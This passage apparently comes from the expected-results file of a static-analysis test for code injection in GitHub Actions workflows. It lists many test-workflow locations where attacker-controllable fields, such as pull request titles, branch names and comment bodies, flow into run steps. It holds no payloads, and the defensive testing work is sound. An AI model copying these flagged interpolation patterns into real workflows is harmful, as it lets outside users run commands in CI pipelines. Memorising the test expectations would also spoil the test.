.github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | .github/workflows/simple2.yml:3:6:3:24 | pull_request_target | pull_request_target | +| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | ${{ steps.command.outputs.command-arguments }} | .github/workflows/slash_command2.yml:2:5:2:17 | issue_comment | issue_comment | +| .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | .github/workflows/test1.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | .github/workflows/test1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test3.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | ${{ toJSON(github.event.comment.body).foo }} | .github/workflows/test5.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | ${{ steps.comment-branch.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | issue_comment | +| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | ${{ steps.refs.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | issue_comment | +| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | ${{ steps.issue_body_parser_request.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | ${{ fromJson(needs.parse-issue.outputs.payload) }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | ${{ needs.get-artifacts.outputs.pr_num }} | .github/workflows/test11.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | ${{ github.event.pull_request.title \|\| "foo" }} | .github/workflows/test12.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | ${{ github.event.changes.body.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | ${{ github.event.changes.title.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | ${{ github.event.changes.head.ref.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | ${{ toJson(github.event.changes) }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:14:14:15:117 | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq 